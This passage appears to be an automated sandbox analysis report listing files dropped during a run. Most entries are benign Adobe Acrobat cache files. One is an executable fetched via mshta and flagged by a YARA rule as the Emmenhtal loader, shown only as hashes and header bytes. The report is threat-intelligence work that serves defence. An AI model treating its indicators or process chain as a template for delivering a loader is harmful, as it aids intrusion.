SSDEEP:	24:Yv6XJdJT5XIwHepLgE9cQx8LennAvzBvkn0RCmK8czOCCSY:YvcTXRehgy6SAFv5Ah8cv/Y
MD5:	7E03FE555C7CF9BC3B44C54BA87B3CA3
SHA1:	FF0CC5CE6E6DCA9A77BA6E78130617B5C4595D0C
SHA-256:	14D3508C4FE22465BBDC01B1E0181115534A55DDC49B97BD05B1C80EE0428F52
SHA-512:	1DF482A029AD5D548AF8F320099CDDCB3DB872DAEA77A28017935C5E4A05929DFEF8502E24D910EC7248FC6B47047B2B4385699858F06EBADD95C95E4E5D8762
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.295362729261
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJf8dPeUkwRe9:YvXKXJdkST5LjIPYH5GU8Ukee9
MD5:	9976BC91FF2B732454734082343B09E6
SHA1:	7A33463610D32065F5D363399AE1E7F02FC012FA
SHA-256:	F93624F5393DB84365D8576456F790EAF420D3B5F6B8B220BD15537FC7F666A7
SHA-512:	6AE75E062B73EFE684BA4298F0ECAE33591B5C5982EF4F40D777047AD6237C7A50B84C66024735BBF680C09279A2E61286F606A0F50AEE72EFF217CC345F1C20
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.287240025026536
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfQ1rPeUkwRe9:YvXKXJdkST5LjIPYH5GY16Ukee9
MD5:	36AF322CB1AF470572CB21FF148D6FF8
SHA1:	21ADFA8485D1532D7AECE15CDB58221B67FE8B78
SHA-256:	B9A7B0D3731B9B4743EDB85A3CDB8E8C16820304FECA4900A82D0266E14A5A89
SHA-512:	8F7DC7AA493186D976B7CCFE3BF2711DF1D668E73CB6DEE9588E07A5AB6440EE2B7B96F55379D52846435FF636CF919241CB6B59ECEC3972252B8D88A87E4171
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.303095133565702
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfFldPeUkwRe9:YvXKXJdkST5LjIPYH5Gz8Ukee9
MD5:	DA0AAC4A0D985F1A420ADA7CC4EC07BD
SHA1:	DBF221084A739F2054CFB71FC34EAF4422BF267E
SHA-256:	22BF55A300627423276EE67B501005FAB910CAFDE005912A2B0046B7294778E4
SHA-512:	E1E8EA061D6A5F3662996674401A91D7E579FF6C568090FA78CF882BC5888FB97772A665E31200584E49632AA0B4D5334B7DAE6953F4B88706194FD455DB8758
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.319795913445828
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfzdPeUkwRe9:YvXKXJdkST5LjIPYH5Gb8Ukee9
MD5:	41BA931C9F697E8C5D06FA4DFB5AB656
SHA1:	CD939A84EC5CA3984607BF39DC9ECB2A38C44BEE
SHA-256:	06C4794C0F26AE2AD8BA38BBAB0857935798DF7271C11A922874701F645F2579
SHA-512:	58230C37A3215483790FD2A79830F970867785467E0BE940AF240D30D7F3B2B9EE8BD8CEB653F8382DB18EE7F4718D477869B9AD785CCB8BAA8AB2C659924CC9
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.301238673558839
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfYdPeUkwRe9:YvXKXJdkST5LjIPYH5Gg8Ukee9
MD5:	FBB192204941D4435A87CF7EE3F97217
SHA1:	EA13A1DCBDD5F377A01153A824A7A5088E05AB50
SHA-256:	51ABDAE63DDFEA9FAAD35A347BCF0F05B70A3B351742A14C36A288C82E1567A6
SHA-512:	1D621941E77ADA866F03F81507F62956C46B79101D4E3590686DD4BAD1E3C5ADADE8C471F9EB0DA74D3CA545637F69811CFA8783896089897544A516DEB48AB2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.288159695004449
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJf+dPeUkwRe9:YvXKXJdkST5LjIPYH5G28Ukee9
MD5:	E9771508EBE0795B6A70BA5DB78EECF7
SHA1:	EBC64AEEFB476F84C728628ABF1CD4FC72984036
SHA-256:	C5A026EC6B9B2E721A3DBF56C2733E6D9467CB9C6CAB61F03CA9848A6DD47F1F
SHA-512:	BA5CA055552DFB41DEB0BE59EC6046697B1BC657558A2AADBD0E04396FC2ECF65821741A60C35354C2DA147B8E25B796E2D1EE1AEDF9EB1F55780D4F38D80AE3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.284777258012367
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfbPtdPeUkwRe9:YvXKXJdkST5LjIPYH5GDV8Ukee9
MD5:	D4108801CFE972258F294DD294AB4A22
SHA1:	A0792AEFCE82D8C875D2A8679CCE940F6CD369EF
SHA-256:	499F5B4F6F6ADD6A359AC39F7DA4FE71BCF6D8275CC74152D795C1206E635C64
SHA-512:	AF28D03959F57B3B75C1707EFAEDC783350D1AE5748D9A4A349650B17B8B435DB3E6CB697E0F4EB6B90FCAD049533785F457C153837E5CB2FCFB105AD8C847A5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.277708679317514
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJf21rPeUkwRe9:YvXKXJdkST5LjIPYH5G+16Ukee9
MD5:	3EF8C044444C5B84B072CB16A1E26378
SHA1:	829BCFAC017CE564B81880C194AA7BD2E786B3D7
SHA-256:	B0624AB59100498DBB6468F8DAF4BF634DFCAAD81B05A632882F66DA4C437A08
SHA-512:	B5F68AC38FA5D59CBF369E72D4DA21B34AE0D09834469790B97B864C28370A4DCFA2D01F190D2B3585746B9C869BDA9444EBC9BCA5E30D5EF2EAFDE7B68B9946
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.664127014450319
Encrypted:	false
SSDEEP:	24:Yv6XJdJT5XIwHCamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSY:YvcTXRcBgkDMUJUAh8cvMY
MD5:	C155E64C3AE66ED06D7BCFAFB5C076CA
SHA1:	CA8C1910FAFBB498E08B35E084F2E5DF56D06AA4
SHA-256:	3863F976AC3D82A8572BCC2893D7179E2FD62D4D1BE5E7032DC2DDBB32E9A6FC
SHA-512:	4086C83A03C0BD74BE682E432E0029179231344E1D34BFB69B798992F96865F2B2A5E3715C4C0546E8ABF4B79BF47BCB95B80B26AAEA121E77A5B4A41C52D926
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.251156066311738
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJfshHHrPeUkwRe9:YvXKXJdkST5LjIPYH5GUUUkee9
MD5:	366CE970217D7237E58E4C0D03D3345A
SHA1:	8FB06E258DAB158DB1C536BD66233229C95B14B3
SHA-256:	A239D3B3A4C078FEC266005C1798C4B222E8102A14FE1272DE0ADB15F90CA02E
SHA-512:	5C42CEBBE5FC751C5F3B45368F7D3F3CF4C2201C220C6388AD17A6164A0D8AE5A8584F8C35DF36725A96C7E14CD232781ACDC77B650D2F684F22620FBE725B66
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.264201072515228
Encrypted:	false
SSDEEP:	6:YEQXJ2HXJrjVkgYmSg1c2LjcWkHvR0YgjHKoAvJTqgFCrPeUkwRe9:YvXKXJdkST5LjIPYH5GTq16Ukee9
MD5:	7128702C7D3AC19BA3B1DA660D678D8C
SHA1:	7DDBAEEA897CC805D7496AA7B14C3F797F80FCB6
SHA-256:	C7F9C76BE686598457BD03B4EB4C0CE01A71A42F0F6E8B87352813DD7EE6A131
SHA-512:	F280910E53FB4984272545375410CCC2230DD78A2B9A8DC036EEC0788804ADA5ED9BD6316EBA164D095B9A389ED8CB06AC3436D112FDE6D067E4DC6AC571B4E4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"75ba7a6d-aa1a-4b90-8903-66deece19e1b","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735553348790,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.141951244704584
Encrypted:	false
SSDEEP:	24:YwTaUayDa4EzVNH4jPj0Si0mkDksg4t7YgH2a2LS5CoxgeDJE5Z9NIueOG:YJ4Eibvm+ksgjOL7LgeGT9S
MD5:	AEA02EFB0E4B4967745AD985B1C25AFB
SHA1:	5B96ED2495FB7718D762F246574EC197A066D937
SHA-256:	CC35A16D4C9E16ED0AA76D9C0DECFDEAC325F484BA57CE34F58FF0A8E0920F87
SHA-512:	CBA6492A4767E2472DE79DD6B345E5A344781929C2823CE0313D72A44D70599B3F5EE000F670EA4BBBAE132C91856BBB64A7BF10251DBD5E62EEB7C0A507606D
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"25cbf305ec5cc715e91102ab7b4ca459","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735374938000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"0e531073bc1d8e859aba1f23b122ccf1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735374938000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"87ae5470e3a4164a8326cd0c8c6270a4","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735374938000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"1919ae077354110c15ac8d994e0eea80","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735374938000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8e6628c073e659a4b6b1808fb15ab07c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735374938000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e7b31db0cf9d1c2270a76711bfe7feef","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.3654325789268384
Encrypted:	false
SSDEEP:	24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDun1/XKdqEKfS8EKfM1baf1/F:Tll2GL7msMcKTlS8fcsun1UfIf1N
MD5:	285D2ADC1682DAEBDFC89826135CB33F
SHA1:	8611439B56B578FC23B58E8AEE14FC39841C449D
SHA-256:	4E04D9FCBBB6E3348AE7320E162AED740E2A936FD360A061C633A06D9BEB707D
SHA-512:	49E15FEDE5BFB138C954ECAA0A5F5B66D943595D99BCD29B189D4403CC39DE661628C9A54D5032690422569284F617DB1FC8443FF77E33CD2991D248CCD9FAAD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.8421462138557545
Encrypted:	false
SSDEEP:	24:7+t/Z6bqyKn6ylSTofcNqDun1/+KdqEKfS8EKfM1banbqdCvqLKufx/XYKQvGJFo:7MxcKTlS8fcsun1tfIcCqGufl2GL7msY
MD5:	60D300F7C653DC1BAC443D619C3775F0
SHA1:	D2EA8373568B9C21C84B64B2D854A442E15A42B9
SHA-256:	33D3DCE54C3A7F770114F640AD6EFE38C60E9345DDED7BFB9411F177DE9A7A12
SHA-512:	E6BD49EA58DFB2C62766DF5559B07330E0E30DA334317C52337718F5385C5B2A86CF9A76C411867328CF6D24F9BCDB4A00932F081F95AA60BDEBE65372E8B987
Malicious:	false
Preview:	.... .c......V............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgnnGtakDt1w1W8BZY+4JkzD6BWYyu:6a6TZ44ADEnnmTDnEW8B2+yYK
MD5:	0D547647376CED9610A89DD15A183971
SHA1:	42BB2CE3623D4D8D5D40B87B58DBDA323572E57F
SHA-256:	02E7B90C2A79128B687E6BC58464F8D5E3A28166C7333DDB2CA1A0B5F5C76F72
SHA-512:	D5B6FB82FB4BCB8FE1247E896C805746043F054EB5975DB98E0EB3A091B9D74A197A05200591155A7FC5A89191A01FC0D1865FBB5E56E5E4CD75D7F6BD11FC7B
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	6.376025756750853
Encrypted:	false
SSDEEP:	6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6A4fohaNDyEJXsEy6bhaNDyEJ7:Hj186Nj186Oj186/j186ij186Z
MD5:	94985E174583F8F85795AEF6D3CCBD11
SHA1:	D14C042EB2E94C0E7E7887C70DFDE1DBA2FEEB20
SHA-256:	6DC6987134128E700B21F8B304EB8E351C078BE75B359D25B58814D789518ECD
SHA-512:	80123D2757B117C340277CC945D3E14EC801349AA1738803538F63426FDDC4F0F8326F0AF380470D4B9BA92AC648EA7AB9F56116A292A631E4DF10CE46860DCF
Malicious:	false
Yara Hits:	Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1], Author: Sekoia.io
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...\|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\MSIe7fc3.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.537590009309966
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Egb+rwle:Qw946cPbiOxDlbYnuRKCMww
MD5:	5AD40BA5E97A09F05B1DB2E4FCD6BA01
SHA1:	7E4A1B430130005B3B1C82BF2F5B8E37A1FA3C79
SHA-256:	6C2CD0EC89AA550B541961A669F14DDB98F68E136DFE3A3B4C1730997401A668
SHA-512:	8B089F98714F84AC3F34D8F98DEFF37146E8D4F9E157E2405241B2C1E16CD450BFF07DD9FC1F589946089E9D83C52258944157F461E7802FF5DC61666E1F8AD6
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.8./.1.2./.2.0.2.4. . .0.3.:.3.5.:.3.6. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kbiiip3.ngg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jn1u1xp.0mn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
